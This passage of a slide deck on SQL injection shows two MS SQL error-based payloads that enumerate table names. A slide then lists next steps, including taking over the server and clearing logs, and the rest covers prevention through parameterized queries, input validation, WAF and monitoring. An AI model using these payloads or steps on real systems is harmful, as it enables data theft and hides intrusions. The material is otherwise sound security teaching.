  • 34. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
  • 35. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
  • 36. Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
  • 37. How to Prevent SQL Injection
  • 38. Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
  • 39. Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
  • 40. Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
  • 41. Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
  • 42. Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
  • 43. Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
  • 44. Prevent SQL Injection Platform level prevention - IPS
  • 45. Prevent SQL Injection Platform level prevention – Log collection and Monitoring